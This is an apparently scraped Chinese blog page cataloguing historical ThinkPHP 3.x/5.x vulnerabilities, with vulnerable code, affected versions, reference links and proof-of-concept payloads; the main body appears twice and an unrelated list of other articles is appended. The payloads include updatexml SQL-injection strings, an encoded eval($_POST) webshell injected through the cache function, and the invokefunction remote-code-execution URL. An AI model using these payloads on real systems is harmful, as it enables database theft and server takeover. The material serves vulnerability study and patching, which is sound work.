https://github.com/pochubs/pochubs/blob/master/ThinkPHP.md tp 历史漏洞

路由控制類RCE
/think/App.php

  1. if (!preg_match('/^[A-Za-z](\w|\.)*$/', $controller)) {
  2. throw new HttpException(404, 'controller not exists:' . $controller);
  3. }

變量覆蓋RCE
/think/Request.php

  1. if (in_array($method, ['GET', 'POST', 'DELETE', 'PUT', 'PATCH'])) {
  2. $this->method = $method;
  3. $this->{$this->method}($_POST);

SQL:
1.
漏洞影响版本: 5.0.13<=ThinkPHP<=5.0.15 、 5.1.0<=ThinkPHP<=5.1.5 。

  1. $username = request()->get('username/a');
  2. db('users')->insert(['username' => $username]);

2.
5.1.6<=ThinkPHP<=5.1.7 (非最新的 5.1.8 版本也可利用)。

  1. $username = request()->get('username/a');
  2. db('users')->where(['id' => 1])->update(['username' => $username]);
  3. return 'Update success';

3.
ThinkPHP 中存在的 SQL注入 漏洞( select 方法注入)。ThinkPHP5全版本 。

  1. $username = request()->get('username');
  2. $result = db('users')->where('username','exp',$username)->select();
  3. return 'select success

';

4.。漏洞影响版本: ThinkPHP=5.0.10 。

漏洞环境

  1. $username = request()->get('username/a');
  2. $result = db('users')->where(['username' => $username])->select();
  3. var_dump($result);

5.

漏洞影响版本: 5.1.16<=ThinkPHP5<=5.1.22 。

  1. $orderby = request()->get('orderby');
  2. $result = db('users')->where(['username' => 'mochazz'])->order($orderby)->find();

6.
漏洞影响版本: 5.0.0<=ThinkPHP<=5.0.21 、 5.1.3<=ThinkPHP5<=5.1.25 。

  1. $options = request()->get('options');
  2. $result = db('users')->max($options);
  3. var_dump($result);

文件包含
5.0.0<=ThinkPHP5<=5.0.18 、5.1.0<=ThinkPHP<=5.1.10。

  1. public function index()
  2. {
  3.   $this->assign(request()->get());
  4.   return $this->fetch();

一、3.x

使用方法

  1. cd /var/www/tp3

ThinkPHP3.2.3_缓存函数设计缺陷可导致Getshell

标题 ThinkPHP5.0.10-3.2.3缓存函数设计缺陷可导致Getshell
时间 2017-08-09
版本 <= 3.2.3
文章链接 https://xz.aliyun.com/t/99

ThinkPHP3.2.3_最新版update注入漏洞

标题 Thinkphp3.2.3最新版update注入漏洞
时间 2018-04-16
版本 <= 3.2.3
文章链接 https://www.anquanke.com/post/id/104847

ThinkPHP3.2.X_find_select_delete注入

标题 thinkphp3.2 find_select_delete注入
时间 2018-08-23
版本 <= 3.2.3
文章链接 https://xz.aliyun.com/t/2631
https://xz.aliyun.com/t/2629

ThinkPHP3.X_order_by注入漏洞

标题 ThinkPHP 3.X/5.X order by注入漏洞
时间 2018-08-29
版本 <= 3.2.3
文章链接 https://mp.weixin.qq.com/s/jDvOif0OByWkUNLv0CAs7w

二、5.x

使用方法

  1. cd /var/www/tp5

ThinkPHP5_SQL注入漏洞&&敏感信息泄露

标题 ThinkPHP5 SQL注入漏洞 && 敏感信息泄露
时间 2017-07-03
版本 < 5.0.9
文章链接 https://xz.aliyun.com/t/125 
https://www.leavesongs.com/PENETRATION/thinkphp5-in-sqlinjection.html

测试方法

  1. git checkout 02f8e8a

测试代码

  1. public  function testsql()
  2. {
  3.   $ids = input('ids/a');
  4.   $result = db('user')->where('id', 'in', $ids)->select();
  5.   var_dump($result);
  6. }

POC

  1. testsql?ids[0,updatexml(0,concat(0xa,user()),0)]=1231

结果

ThinkPHP5.0.10-3.2.3_缓存函数设计缺陷可导致Getshell

标题 ThinkPHP5.0.10-3.2.3 缓存函数设计缺陷可导致Getshell
时间 2017-08-09
版本 < 5.0.11
文章链接 https://xz.aliyun.com/t/99

测试方法

  1. git checkout 094dde5

测试代码

  1. public function add()
  2. {
  3.    $user = input('post.');
  4.    $m=db('user')->where(['id'=> 1])->insert($user);
  5. }
  6.  
  7. public function cache()
  8. {
  9.    $m = db('user')->select();
  10.    Cache::set('name',$m,3600);
  11. }

POC

  1. post data:
  2.    username=%2F%2F%0D%0A%24a%3Deval(%24_POST%5B%27a%27%5D)%3B%23
  3. 注:%2F%2F%0D%0A = //+回车

结果

其中文件路径和名称是 b0+68931cc450442b63f5b3d276ea4297 而

md5('name') = b068931cc450442b63f5b3d276ea4297

ThinkPHP框架5.0.X_sql注入漏洞分析

标题 ThinkPHP框架 5.0.x sql注入漏洞分析
时间 2018-04-09
版本 < 5.0.16
文章链接 https://xz.aliyun.com/t/2257

测试方法

  1. git checkout 7c13757

测试代码

  1. public  function testsql()
  2.    {
  3.        $username = input('get.username/a');
  4.        db('user')->where(['id'=> 1])->insert(['username'=>$username]);
  5.    }

POC

  1. testsql?username[0]=inc&username[1]=updatexml(1,concat(0x7,user(),0x7e),1)&username[2]=1

结果

ThinkPHP5.X_order_by注入漏洞

标题 ThinkPHP 3.X/5.X order by注入漏洞
时间 2018-08-23
版本 <= 5.1.22
文章链接 https://mp.weixin.qq.com/s/jDvOif0OByWkUNLv0CAs7w

测试方法

  1. git checkout 35e9878

测试代码

  1. public  function testsql()
  2. {
  3.   $order = input('get.order');
  4.   $m = db('user')->order($order)->find();
  5.   var_dump($m);
  6. }

POC

  1. testsql?order[id`|updatexml(1,concat(0x3a,user()),1)%23]=1

结果

ThinkPHP5.X_远程代码执行

标题 ThinkPHP5.X 远程代码执行
时间 2018-12-10
版本 5.0.5-5.0.22
5.1.0-5.1.30
文章链接 https://xz.aliyun.com/t/3570
https://paper.seebug.org/760/
https://paper.seebug.org/770

测试方法

  1. git checkout 4fefa5e

测试代码

  1. public  function index()
  2.    {
  3.        //...无需实际代码
  4.     }

POC

  1. index?s=index/\think\container/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1

结果

一、3.x

使用方法

  1. cd /var/www/tp3

ThinkPHP3.2.3_缓存函数设计缺陷可导致Getshell

标题 ThinkPHP5.0.10-3.2.3缓存函数设计缺陷可导致Getshell
时间 2017-08-09
版本 <= 3.2.3
文章链接 https://xz.aliyun.com/t/99

ThinkPHP3.2.3_最新版update注入漏洞

标题 Thinkphp3.2.3最新版update注入漏洞
时间 2018-04-16
版本 <= 3.2.3
文章链接 https://www.anquanke.com/post/id/104847

ThinkPHP3.2.X_find_select_delete注入

标题 thinkphp3.2 find_select_delete注入
时间 2018-08-23
版本 <= 3.2.3
文章链接 https://xz.aliyun.com/t/2631
https://xz.aliyun.com/t/2629

ThinkPHP3.X_order_by注入漏洞

标题 ThinkPHP 3.X/5.X order by注入漏洞
时间 2018-08-29
版本 <= 3.2.3
文章链接 https://mp.weixin.qq.com/s/jDvOif0OByWkUNLv0CAs7w

二、5.x

使用方法

  1. cd /var/www/tp5

ThinkPHP5_SQL注入漏洞&&敏感信息泄露

标题 ThinkPHP5 SQL注入漏洞 && 敏感信息泄露
时间 2017-07-03
版本 < 5.0.9
文章链接 https://xz.aliyun.com/t/125 
https://www.leavesongs.com/PENETRATION/thinkphp5-in-sqlinjection.html

测试方法

  1. git checkout 02f8e8a

测试代码

  1. public  function testsql()
  2. {
  3.   $ids = input('ids/a');
  4.   $result = db('user')->where('id', 'in', $ids)->select();
  5.   var_dump($result);
  6. }

POC

  1. testsql?ids[0,updatexml(0,concat(0xa,user()),0)]=1231

结果

ThinkPHP5.0.10-3.2.3_缓存函数设计缺陷可导致Getshell

标题 ThinkPHP5.0.10-3.2.3 缓存函数设计缺陷可导致Getshell
时间 2017-08-09
版本 < 5.0.11
文章链接 https://xz.aliyun.com/t/99

测试方法

  1. git checkout 094dde5

测试代码

  1. public function add()
  2. {
  3.    $user = input('post.');
  4.    $m=db('user')->where(['id'=> 1])->insert($user);
  5. }
  6.  
  7. public function cache()
  8. {
  9.    $m = db('user')->select();
  10.    Cache::set('name',$m,3600);
  11. }

POC

  1. post data:
  2.    username=%2F%2F%0D%0A%24a%3Deval(%24_POST%5B%27a%27%5D)%3B%23
  3. 注:%2F%2F%0D%0A = //+回车

结果

其中文件路径和名称是 b0+68931cc450442b63f5b3d276ea4297 而

md5('name') = b068931cc450442b63f5b3d276ea4297

ThinkPHP框架5.0.X_sql注入漏洞分析

标题 ThinkPHP框架 5.0.x sql注入漏洞分析
时间 2018-04-09
版本 < 5.0.16
文章链接 https://xz.aliyun.com/t/2257

测试方法

  1. git checkout 7c13757

测试代码

  1. public  function testsql()
  2.    {
  3.        $username = input('get.username/a');
  4.        db('user')->where(['id'=> 1])->insert(['username'=>$username]);
  5.    }

POC

  1. testsql?username[0]=inc&username[1]=updatexml(1,concat(0x7,user(),0x7e),1)&username[2]=1

结果

ThinkPHP5.X_order_by注入漏洞

标题 ThinkPHP 3.X/5.X order by注入漏洞
时间 2018-08-23
版本 <= 5.1.22
文章链接 https://mp.weixin.qq.com/s/jDvOif0OByWkUNLv0CAs7w

测试方法

  1. git checkout 35e9878

测试代码

  1. public  function testsql()
  2. {
  3.   $order = input('get.order');
  4.   $m = db('user')->order($order)->find();
  5.   var_dump($m);
  6. }

POC

  1. testsql?order[id`|updatexml(1,concat(0x3a,user()),1)%23]=1

结果

ThinkPHP5.X_远程代码执行

标题 ThinkPHP5.X 远程代码执行
时间 2018-12-10
版本 5.0.5-5.0.22
5.1.0-5.1.30
文章链接 https://xz.aliyun.com/t/3570
https://paper.seebug.org/760/
https://paper.seebug.org/770

测试方法

  1. git checkout 4fefa5e

测试代码

  1. public  function index()
  2.    {
  3.        //...无需实际代码
  4.     }

POC

  1. index?s=index/\think\container/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1

结果

thinkphp历史漏洞的更多相关文章

  1. 记录 ThinkPHP 5.* 漏洞修复后的情况

    记录 ThinkPHP 5.* 漏洞修复后的情况 ThinkPHP 官方 2018-12-09 下午收到漏洞报告. 2018-12-09 晚上看到 Git 已经更新了,修复了漏洞. 2018-12-1 ...

  2. 整理了一下 ThinkPHP 历史

    整理了一下 ThinkPHP 历史 ThinkPHP 一款国内最流行的 PHP 开源框架.

  3. THINKPHP网站漏洞怎么修复解决

    THINKPHP漏洞修复,官方于近日,对现有的thinkphp5.0到5.1所有版本进行了升级,以及补丁更新,这次更新主要是进行了一些漏洞修复,最严重的就是之前存在的SQL注入漏洞,以及远程代码执行查 ...

  4. 整理了一下 ThinkPHP 历史 (2019-07-01)

    整理了一下 ThinkPHP 历史 ThinkPHP 一款国内最流行的 PHP 开源框架. 版本 发布日期 最后更新日期 总天数 ThinkPHP(FCS) 0.6 2006-01-15 2006-0 ...

  5. Spring 历史漏洞复现

    1.Spring Security OAuth2.0 (CVE-2016-4977) 这个洞是由于Spring Security OAuth2.0的功能,在登录成功之后由于response_type不 ...

  6. Solr-rce历史漏洞复现

    最近Solr又出了一个RCE漏洞,复现了一下 # coding: utf-8 import requestsimport argparsefrom urllib import parse if __n ...

  7. phpMyAdmin历史漏洞复现

    简介 phpMyAdmin是一个非常受欢迎的基于web的MySQL数据库管理工具.它能够创建和删除数据库,创建/删除/修改表格,删除/编辑/新增字段,执行SQL脚本等 复现三个古老漏洞 phpMyAd ...

  8. PHP代码审计基础-高级篇

    高级篇主要讲 1. 熟知各个开源框架历史版本漏洞. 2. 业务逻辑漏洞 3. 多线程引发的漏洞 4. 事务锁引发的漏洞 在高级篇审计中有很多漏洞正常情况下是不存在的只有在特殊情况下才有 PHP常用框架 ...

  9. ThinkPHP 3.1、3.2一个通用的漏洞分析

    Author:m3d1t10n 前两天看到phithon大大在乌云发的关于ThinkPHP的漏洞,想看看是什么原因造成的.可惜还没有公开,于是就自己回来分析了一下. 0x00官方补丁(DB.class ...

随机推荐

  1. 【原创】关于java对象需要重写equals方法,hashcode方法,toString方法 ,compareto()方法的说明

    在项目开发中,我们都有这样的经历,就是在新增表时,会相应的增加java类,在java类中都存在常见的几个方法,包括:equals(),hashcode(),toString() ,compareto( ...

  2. [转] [知乎] Roguelite 和 Roguelike 的区别是什么?

    编者按 本文译自 Ethan Hawkes 一篇介绍 rogue-lite 概念的文章,已获作者授权,英文原文见这里,译文首发于这里.注意本文写于 2013 年,正是 roguelite 类型的独立游 ...

  3. AJ学IOS(37)UI之CALayer

    AJ分享,必须精品 CALayer 在iOS中,你能看得见摸得着的东西基本上都是UIView,比如一个按钮.一个文本标签.一个文本输入框.一个图标等等,这些都是UIView. 其实UIView之所以能 ...

  4. 详解 LinkedHashMap

    同学们可能在看到这个类的时候就明白了很多关于这个类的特点,那么,本人就在这里来啰嗦一下,再来介绍下这个类: (有关Map集合的基本性质,请观看本人博文-- <详解 Map集合>) Link ...

  5. 6.表单提交,input键盘变搜索,有关自定义属性input操作

    1.键盘变搜索 1.) 在form 上加action="#", 2.)input type=search, 3.)此时会提交到 #,需要再添加一个input display=non ...

  6. 来个干货——使用VS2019发布.NET Core程序并部署到IIS的最新教程

    使用VS2019发布.NET Core程序并部署到IIS,不管你是使用.NET Core开发的是Web API还是网站类的程序,如果你是部署到IIS,那么下面的内容都适合于你,不会将.NET Core ...

  7. 从零开始学习docker之docker的安装

    一.Docker 使用 Google 公司推出的 Go 语言 进行开发实现,基于 Linux 内核的 cgroup,namespace,以及 OverlayFS 类的 Union FS 等技术,对进程 ...

  8. Mac剪切板中的PNG保存到文件swift

    SwiftGG 教程大全 中文翻译 命令行工具开发教程 Line Programs on macOS Tutorial swift4,较详细 Swift基础中需要注意的点 NSPasteboard M ...

  9. tensorflow1.0 dropout层

    """ Please note, this code is only for python 3+. If you are using python 2+, please ...

  10. php函数封装

    这是一些自定义封装的函数类,调用起来很方便,以后会有更多的封装函数更新! // 弹框跳转function alert($msg,$url=''){ echo "<script>& ...